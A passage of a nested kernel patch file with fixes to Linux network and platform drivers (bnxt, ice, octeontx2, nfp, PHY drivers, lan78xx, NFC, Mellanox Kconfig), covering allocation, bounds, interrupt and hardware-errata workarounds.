+-	int i, j, total_aggs = 0;
++	int i, j;
+ 
+ 	bp->max_tpa = MAX_TPA;
+ 	if (bp->flags & BNXT_FLAG_CHIP_P5) {
+ 		if (!bp->max_tpa_v2)
+ 			return 0;
+ 		bp->max_tpa = max_t(u16, bp->max_tpa_v2, MAX_TPA_P5);
+-		total_aggs = bp->max_tpa * MAX_SKB_FRAGS;
+ 	}
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+@@ -3185,12 +3186,12 @@ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ 
+ 		if (!(bp->flags & BNXT_FLAG_CHIP_P5))
+ 			continue;
+-		agg = kcalloc(total_aggs, sizeof(*agg), GFP_KERNEL);
+-		rxr->rx_tpa[0].agg_arr = agg;
+-		if (!agg)
+-			return -ENOMEM;
+-		for (j = 1; j < bp->max_tpa; j++)
+-			rxr->rx_tpa[j].agg_arr = agg + j * MAX_SKB_FRAGS;
++		for (j = 0; j < bp->max_tpa; j++) {
++			agg = kcalloc(MAX_SKB_FRAGS, sizeof(*agg), GFP_KERNEL);
++			if (!agg)
++				return -ENOMEM;
++			rxr->rx_tpa[j].agg_arr = agg;
++		}
+ 		rxr->rx_tpa_idx_map = kzalloc(sizeof(*rxr->rx_tpa_idx_map),
+ 					      GFP_KERNEL);
+ 		if (!rxr->rx_tpa_idx_map)
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb.c b/drivers/net/ethernet/intel/ice/ice_dcb.c
+index 6be02f9b0b8c2..789b99963910d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb.c
++++ b/drivers/net/ethernet/intel/ice/ice_dcb.c
+@@ -1372,7 +1372,7 @@ ice_add_dscp_pfc_tlv(struct ice_lldp_org_tlv *tlv, struct ice_dcbx_cfg *dcbcfg)
+ 	tlv->ouisubtype = htonl(ouisubtype);
+ 
+ 	buf[0] = dcbcfg->pfc.pfccap & 0xF;
+-	buf[1] = dcbcfg->pfc.pfcena & 0xF;
++	buf[1] = dcbcfg->pfc.pfcena;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index a359f1610fc19..8ca61610cec23 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -4314,6 +4314,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 		 * SFP modules only ever use page 0.
+ 		 */
+ 		if (page == 0 || !(data[0x2] & 0x4)) {
++			u32 copy_len;
++
+ 			/* If i2c bus is busy due to slow page change or
+ 			 * link management access, call can fail. This is normal.
+ 			 * So we retry this a few times.
+@@ -4337,8 +4339,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 			}
+ 
+ 			/* Make sure we have enough room for the new block */
+-			if ((i + SFF_READ_BLOCK_SIZE) < ee->len)
+-				memcpy(data + i, value, SFF_READ_BLOCK_SIZE);
++			copy_len = min_t(u32, SFF_READ_BLOCK_SIZE, ee->len - i);
++			memcpy(data + i, value, copy_len);
+ 		}
+ 	}
+ 	return 0;
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index 95f392ab96708..ce72d512eddf9 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -1448,8 +1448,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_VLAN_PRIO;
+ 			headers->vlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 
+ 		if (match.mask->vlan_tpid)
+@@ -1482,8 +1482,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_CVLAN_PRIO;
+ 			headers->cvlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 7f0a64731c675..f6c45cf27caf4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -866,6 +866,9 @@ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf,
+ 			int slot);
+ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc);
+ 
++#define NDC_AF_BANK_MASK       GENMASK_ULL(7, 0)
++#define NDC_AF_BANK_LINE_MASK  GENMASK_ULL(31, 16)
++
+ /* CN10K RVU */
+ int rvu_set_channels_base(struct rvu *rvu);
+ void rvu_program_channels(struct rvu *rvu);
+@@ -881,6 +884,8 @@ static inline void rvu_dbg_init(struct rvu *rvu) {}
+ static inline void rvu_dbg_exit(struct rvu *rvu) {}
+ #endif
+ 
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr);
++
+ /* RVU Switch */
+ void rvu_switch_enable(struct rvu *rvu);
+ void rvu_switch_disable(struct rvu *rvu);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index fa280ebd3052b..26cfa501f1a11 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -198,9 +198,6 @@ enum cpt_eng_type {
+ 	CPT_IE_TYPE = 3,
+ };
+ 
+-#define NDC_MAX_BANK(rvu, blk_addr) (rvu_read64(rvu, \
+-						blk_addr, NDC_AF_CONST) & 0xFF)
+-
+ #define rvu_dbg_NULL NULL
+ #define rvu_dbg_open_NULL NULL
+ 
+@@ -1448,6 +1445,7 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 	struct nix_hw *nix_hw;
+ 	struct rvu *rvu;
+ 	int bank, max_bank;
++	u64 ndc_af_const;
+ 
+ 	if (blk_addr == BLKADDR_NDC_NPA0) {
+ 		rvu = s->private;
+@@ -1456,7 +1454,8 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 		rvu = nix_hw->rvu;
+ 	}
+ 
+-	max_bank = NDC_MAX_BANK(rvu, blk_addr);
++	ndc_af_const = rvu_read64(rvu, blk_addr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
+ 	for (bank = 0; bank < max_bank; bank++) {
+ 		seq_printf(s, "BANK:%d\n", bank);
+ 		seq_printf(s, "\tHits:\t%lld\n",
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 6b8747ebc08c6..bcce42cd1c240 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -790,6 +790,7 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 	struct nix_aq_res_s *result;
+ 	int timeout = 1000;
+ 	u64 reg, head;
++	int ret;
+ 
+ 	result = (struct nix_aq_res_s *)aq->res->base;
+ 
+@@ -813,9 +814,22 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NIX_AQ_COMP_GOOD)
++	if (result->compcode != NIX_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NIX_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NIX_AQ_COMP_LOCKERR ||
++		    result->compcode == NIX_AQ_COMP_CTX_POISON) {
++			ret = rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_TX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_TX);
++			if (ret)
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+index 70bd036ed76e4..4f5ca5ab13a40 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+@@ -4,7 +4,7 @@
+  * Copyright (C) 2018 Marvell.
+  *
+  */
+-
++#include <linux/bitfield.h>
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ 
+@@ -42,9 +42,18 @@ static int npa_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NPA_AQ_COMP_GOOD)
++	if (result->compcode != NPA_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NPA_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NPA_AQ_COMP_LOCKERR ||
++		    result->compcode == NPA_AQ_COMP_CTX_POISON) {
++			if (rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NPA0))
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+@@ -545,3 +554,48 @@ void rvu_npa_lf_teardown(struct rvu *rvu, u16 pcifunc, int npalf)
+ 
+ 	npa_ctx_free(rvu, pfvf);
+ }
++
++/* Due to an Hardware errata, in some corner cases, AQ context lock
++ * operations can result in a NDC way getting into an illegal state
++ * of not valid but locked.
++ *
++ * This API solves the problem by clearing the lock bit of the NDC block.
++ * The operation needs to be done for each line of all the NDC banks.
++ */
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr)
++{
++	int bank, max_bank, line, max_line, err;
++	u64 reg, ndc_af_const;
++
++	/* Set the ENABLE bit(63) to '0' */
++	reg = rvu_read64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL);
++	rvu_write64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, reg & GENMASK_ULL(62, 0));
++
++	/* Poll until the BUSY bits(47:32) are set to '0' */
++	err = rvu_poll_reg(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, GENMASK_ULL(47, 32), true);
++	if (err) {
++		dev_err(rvu->dev, "Timed out while polling for NDC CAM busy bits.\n");
++		return err;
++	}
++
++	ndc_af_const = rvu_read64(rvu, blkaddr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
++	max_line = FIELD_GET(NDC_AF_BANK_LINE_MASK, ndc_af_const);
++	for (bank = 0; bank < max_bank; bank++) {
++		for (line = 0; line < max_line; line++) {
++			/* Check if 'cache line valid bit(63)' is not set
++			 * but 'cache line lock bit(60)' is set and on
++			 * success, reset the lock bit(60).
++			 */
++			reg = rvu_read64(rvu, blkaddr,
++					 NDC_AF_BANKX_LINEX_METADATA(bank, line));
++			if (!(reg & BIT_ULL(63)) && (reg & BIT_ULL(60))) {
++				rvu_write64(rvu, blkaddr,
++					    NDC_AF_BANKX_LINEX_METADATA(bank, line),
++					    reg & ~BIT_ULL(60));
++			}
++		}
++	}
++
++	return 0;
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+index 0e0d536645ac7..39f7a7cb27558 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+@@ -690,6 +690,7 @@
+ #define NDC_AF_INTR_ENA_W1S		(0x00068)
+ #define NDC_AF_INTR_ENA_W1C		(0x00070)
+ #define NDC_AF_ACTIVE_PC		(0x00078)
++#define NDC_AF_CAMS_RD_INTERVAL		(0x00080)
+ #define NDC_AF_BP_TEST_ENABLE		(0x001F8)
+ #define NDC_AF_BP_TEST(a)		(0x00200 | (a) << 3)
+ #define NDC_AF_BLK_RST			(0x002F0)
+@@ -705,6 +706,8 @@
+ 		(0x00F00 | (a) << 5 | (b) << 4)
+ #define NDC_AF_BANKX_HIT_PC(a)		(0x01000 | (a) << 3)
+ #define NDC_AF_BANKX_MISS_PC(a)		(0x01100 | (a) << 3)
++#define NDC_AF_BANKX_LINEX_METADATA(a, b) \
++		(0x10000 | (a) << 12 | (b) << 3)
+ 
+ /* LBK */
+ #define LBK_CONST			(0x10ull)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index e3123723522e3..332329cb1ee00 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -566,7 +566,8 @@ static int mtk_mac_finish(struct phylink_config *config, unsigned int mode,
+ 	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 	mcr_new = mcr_cur;
+ 	mcr_new |= MAC_MCR_IPG_CFG | MAC_MCR_FORCE_MODE |
+-		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK;
++		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK |
++		   MAC_MCR_RX_FIFO_CLR_DIS;
+ 
+ 	/* Only update control register when needed! */
+ 	if (mcr_new != mcr_cur)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index 2d9186d32bc09..b481d0d46bb16 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -383,6 +383,7 @@
+ #define MAC_MCR_FORCE_MODE	BIT(15)
+ #define MAC_MCR_TX_EN		BIT(14)
+ #define MAC_MCR_RX_EN		BIT(13)
++#define MAC_MCR_RX_FIFO_CLR_DIS	BIT(12)
+ #define MAC_MCR_BACKOFF_EN	BIT(9)
+ #define MAC_MCR_BACKPR_EN	BIT(8)
+ #define MAC_MCR_FORCE_RX_FC	BIT(5)
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+index a9aec900d608d..7d66fe75cd3bf 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+@@ -194,7 +194,7 @@ int lan966x_police_port_del(struct lan966x_port *port,
+ 		return -EINVAL;
+ 	}
+ 
+-	err = lan966x_police_del(port, port->tc.police_id);
++	err = lan966x_police_del(port, POL_IDX_PORT + port->chip_port);
+ 	if (err) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Failed to add policer to port");
+diff --git a/drivers/net/ethernet/netronome/nfp/nfd3/dp.c b/drivers/net/ethernet/netronome/nfp/nfd3/dp.c
+index 861082c5dbffb..ee2e442809c69 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfd3/dp.c
++++ b/drivers/net/ethernet/netronome/nfp/nfd3/dp.c
+@@ -327,14 +327,15 @@ netdev_tx_t nfp_nfd3_tx(struct sk_buff *skb, struct net_device *netdev)
+ 
+ 	/* Do not reorder - tso may adjust pkt cnt, vlan may override fields */
+ 	nfp_nfd3_tx_tso(r_vec, txbuf, txd, skb, md_bytes);
+-	nfp_nfd3_tx_csum(dp, r_vec, txbuf, txd, skb);
++	if (ipsec)
++		nfp_nfd3_ipsec_tx(txd, skb);
++	else
++		nfp_nfd3_tx_csum(dp, r_vec, txbuf, txd, skb);
+ 	if (skb_vlan_tag_present(skb) && dp->ctrl & NFP_NET_CFG_CTRL_TXVLAN) {
+ 		txd->flags |= NFD3_DESC_TX_VLAN;
+ 		txd->vlan = cpu_to_le16(skb_vlan_tag_get(skb));
+ 	}
+ 
+-	if (ipsec)
+-		nfp_nfd3_ipsec_tx(txd, skb);
+ 	/* Gather DMA */
+ 	if (nr_frags > 0) {
+ 		__le64 second_half;
+diff --git a/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c b/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c
+index e90f8c975903b..51087693072c2 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c
++++ b/drivers/net/ethernet/netronome/nfp/nfd3/ipsec.c
+@@ -10,9 +10,30 @@
+ void nfp_nfd3_ipsec_tx(struct nfp_nfd3_tx_desc *txd, struct sk_buff *skb)
+ {
+ 	struct xfrm_state *x = xfrm_input_state(skb);
++	struct xfrm_offload *xo = xfrm_offload(skb);
++	struct iphdr *iph = ip_hdr(skb);
++	int l4_proto;
+ 
+ 	if (x->xso.dev && (x->xso.dev->features & NETIF_F_HW_ESP_TX_CSUM)) {
+-		txd->flags |= NFD3_DESC_TX_CSUM | NFD3_DESC_TX_IP4_CSUM |
+-			      NFD3_DESC_TX_TCP_CSUM | NFD3_DESC_TX_UDP_CSUM;
++		txd->flags |= NFD3_DESC_TX_CSUM;
++
++		if (iph->version == 4)
++			txd->flags |= NFD3_DESC_TX_IP4_CSUM;
++
++		if (x->props.mode == XFRM_MODE_TRANSPORT)
++			l4_proto = xo->proto;
++		else if (x->props.mode == XFRM_MODE_TUNNEL)
++			l4_proto = xo->inner_ipproto;
++		else
++			return;
++
++		switch (l4_proto) {
++		case IPPROTO_UDP:
++			txd->flags |= NFD3_DESC_TX_UDP_CSUM;
++			return;
++		case IPPROTO_TCP:
++			txd->flags |= NFD3_DESC_TX_TCP_CSUM;
++			return;
++		}
+ 	}
+ }
+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+index 70d7484c82af4..1182fa48a3b54 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
++++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+@@ -38,6 +38,7 @@
+ #include <net/tls.h>
+ #include <net/vxlan.h>
+ #include <net/xdp_sock_drv.h>
++#include <net/xfrm.h>
+ 
+ #include "nfpcore/nfp_dev.h"
+ #include "nfpcore/nfp_nsp.h"
+@@ -1897,6 +1898,9 @@ nfp_net_features_check(struct sk_buff *skb, struct net_device *dev,
+ 			features &= ~NETIF_F_GSO_MASK;
+ 	}
+ 
++	if (xfrm_offload(skb))
++		return features;
++
+ 	/* VXLAN/GRE check */
+ 	switch (vlan_get_protocol(skb)) {
+ 	case htons(ETH_P_IP):
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 1a5b8dab5e9b6..01f7e19a2ca8b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1170,6 +1170,7 @@ static int stmmac_init_phy(struct net_device *dev)
+ 
+ 		phylink_ethtool_get_wol(priv->phylink, &wol);
+ 		device_set_wakeup_capable(priv->device, !!wol.supported);
++		device_set_wakeup_enable(priv->device, !!wol.wolopts);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/net/phy/microchip.c b/drivers/net/phy/microchip.c
+index ccecee2524ce6..0b88635f4fbca 100644
+--- a/drivers/net/phy/microchip.c
++++ b/drivers/net/phy/microchip.c
+@@ -342,6 +342,37 @@ static int lan88xx_config_aneg(struct phy_device *phydev)
+ 	return genphy_config_aneg(phydev);
+ }
+ 
++static void lan88xx_link_change_notify(struct phy_device *phydev)
++{
++	int temp;
++
++	/* At forced 100 F/H mode, chip may fail to set mode correctly
++	 * when cable is switched between long(~50+m) and short one.
++	 * As workaround, set to 10 before setting to 100
++	 * at forced 100 F/H mode.
++	 */
++	if (!phydev->autoneg && phydev->speed == 100) {
++		/* disable phy interrupt */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++
++		temp = phy_read(phydev, MII_BMCR);
++		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
++		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
++		temp |= BMCR_SPEED100;
++		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
++
++		/* clear pending interrupt generated while workaround */
++		temp = phy_read(phydev, LAN88XX_INT_STS);
++
++		/* enable phy interrupt back */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++	}
++}
++
+ static struct phy_driver microchip_phy_driver[] = {
+ {
+ 	.phy_id		= 0x0007c132,
+@@ -359,6 +390,7 @@ static struct phy_driver microchip_phy_driver[] = {
+ 
+ 	.config_init	= lan88xx_config_init,
+ 	.config_aneg	= lan88xx_config_aneg,
++	.link_change_notify = lan88xx_link_change_notify,
+ 
+ 	.config_intr	= lan88xx_phy_config_intr,
+ 	.handle_interrupt = lan88xx_handle_interrupt,
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 607aa786c8cb4..cd246615b0f94 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3053,8 +3053,6 @@ static int phy_probe(struct device *dev)
+ 	if (phydrv->flags & PHY_IS_INTERNAL)
+ 		phydev->is_internal = true;
+ 
+-	mutex_lock(&phydev->lock);
+-
+ 	/* Deassert the reset signal */
+ 	phy_device_reset(phydev, 0);
+ 
+@@ -3122,12 +3120,10 @@ static int phy_probe(struct device *dev)
+ 	phydev->state = PHY_READY;
+ 
+ out:
+-	/* Assert the reset signal */
++	/* Re-assert the reset signal on error */
+ 	if (err)
+ 		phy_device_reset(phydev, 1);
+ 
+-	mutex_unlock(&phydev->lock);
+-
+ 	return err;
+ }
+ 
+@@ -3137,9 +3133,7 @@ static int phy_remove(struct device *dev)
+ 
+ 	cancel_delayed_work_sync(&phydev->state_queue);
+ 
+-	mutex_lock(&phydev->lock);
+ 	phydev->state = PHY_DOWN;
+-	mutex_unlock(&phydev->lock);
+ 
+ 	sfp_bus_del_upstream(phydev->sfp_bus);
+ 	phydev->sfp_bus = NULL;
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index ac7481ce2fc16..00d9eff91dcfa 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -44,7 +44,6 @@ static struct smsc_hw_stat smsc_hw_stats[] = {
+ };
+ 
+ struct smsc_phy_priv {
+-	u16 intmask;
+ 	bool energy_enable;
+ };
+ 
+@@ -57,7 +56,6 @@ static int smsc_phy_ack_interrupt(struct phy_device *phydev)
+ 
+ static int smsc_phy_config_intr(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int rc;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED) {
+@@ -65,14 +63,9 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 		if (rc)
+ 			return rc;
+ 
+-		priv->intmask = MII_LAN83C185_ISF_INT4 | MII_LAN83C185_ISF_INT6;
+-		if (priv->energy_enable)
+-			priv->intmask |= MII_LAN83C185_ISF_INT7;
+-
+-		rc = phy_write(phydev, MII_LAN83C185_IM, priv->intmask);
++		rc = phy_write(phydev, MII_LAN83C185_IM,
++			       MII_LAN83C185_ISF_INT_PHYLIB_EVENTS);
+ 	} else {
+-		priv->intmask = 0;
+-
+ 		rc = phy_write(phydev, MII_LAN83C185_IM, 0);
+ 		if (rc)
+ 			return rc;
+@@ -85,7 +78,6 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 
+ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int irq_status;
+ 
+ 	irq_status = phy_read(phydev, MII_LAN83C185_ISF);
+@@ -96,7 +88,7 @@ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ 		return IRQ_NONE;
+ 	}
+ 
+-	if (!(irq_status & priv->intmask))
++	if (!(irq_status & MII_LAN83C185_ISF_INT_PHYLIB_EVENTS))
+ 		return IRQ_NONE;
+ 
+ 	phy_trigger_machine(phydev);
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index f18ab8e220db7..068488890d57b 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -2115,33 +2115,8 @@ static void lan78xx_remove_mdio(struct lan78xx_net *dev)
+ static void lan78xx_link_status_change(struct net_device *net)
+ {
+ 	struct phy_device *phydev = net->phydev;
+-	int temp;
+-
+-	/* At forced 100 F/H mode, chip may fail to set mode correctly
+-	 * when cable is switched between long(~50+m) and short one.
+-	 * As workaround, set to 10 before setting to 100
+-	 * at forced 100 F/H mode.
+-	 */
+-	if (!phydev->autoneg && (phydev->speed == 100)) {
+-		/* disable phy interrupt */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+ 
+-		temp = phy_read(phydev, MII_BMCR);
+-		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
+-		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
+-		temp |= BMCR_SPEED100;
+-		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
+-
+-		/* clear pending interrupt generated while workaround */
+-		temp = phy_read(phydev, LAN88XX_INT_STS);
+-
+-		/* enable phy interrupt back */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+-	}
++	phy_print_status(phydev);
+ }
+ 
+ static int irq_map(struct irq_domain *d, unsigned int irq,
+diff --git a/drivers/nfc/fdp/i2c.c b/drivers/nfc/fdp/i2c.c
+index 2d53e0f88d2f9..1e0f2297f9c66 100644
+--- a/drivers/nfc/fdp/i2c.c
++++ b/drivers/nfc/fdp/i2c.c
+@@ -247,6 +247,9 @@ static void fdp_nci_i2c_read_device_properties(struct device *dev,
+ 					   len, sizeof(**fw_vsc_cfg),
+ 					   GFP_KERNEL);
+ 
++		if (!*fw_vsc_cfg)
++			goto alloc_err;
++
+ 		r = device_property_read_u8_array(dev, FDP_DP_FW_VSC_CFG_NAME,
+ 						  *fw_vsc_cfg, len);
+ 
+@@ -260,6 +263,7 @@ vsc_read_err:
+ 		*fw_vsc_cfg = NULL;
+ 	}
+ 
++alloc_err:
+ 	dev_dbg(dev, "Clock type: %d, clock frequency: %d, VSC: %s",
+ 		*clock_type, *clock_freq, *fw_vsc_cfg != NULL ? "yes" : "no");
+ }
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 09c7829e95c4b..382793e73a60a 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -16,17 +16,17 @@ if MELLANOX_PLATFORM
+ 
+ config MLXREG_HOTPLUG
+ 	tristate "Mellanox platform hotplug driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver handles hot-plug events for the power suppliers, power
+ 	  cables and fans on the wide range Mellanox IB and Ethernet systems.
+ 
+ config MLXREG_IO
+ 	tristate "Mellanox platform register access driver support"
+-	depends on REGMAP
+ 	depends on HWMON
++	select REGMAP
+ 	help
+ 	  This driver allows access to Mellanox programmable device register
+ 	  space through sysfs interface. The sets of registers for sysfs access
+@@ -36,9 +36,9 @@ config MLXREG_IO
+ 
+ config MLXREG_LC
+ 	tristate "Mellanox line card platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver provides support for the Mellanox MSN4800-XX line cards,
+ 	  which are the part of MSN4800 Ethernet modular switch systems
+@@ -80,10 +80,9 @@ config MLXBF_PMC
+ 
+ config NVSW_SN2201
+ 	tristate "Nvidia SN2201 platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
+-	depends on REGMAP_I2C
++	select REGMAP_I2C
+ 	help
+ 	  This driver provides support for the Nvidia SN2201 platform.
+ 	  The SN2201 is a highly integrated for one rack unit system with
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index 5692385e2d26f..1396a839dd8a4 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -956,7 +956,8 @@ config SERIAL_MULTI_INSTANTIATE
+ 
+ config MLX_PLATFORM
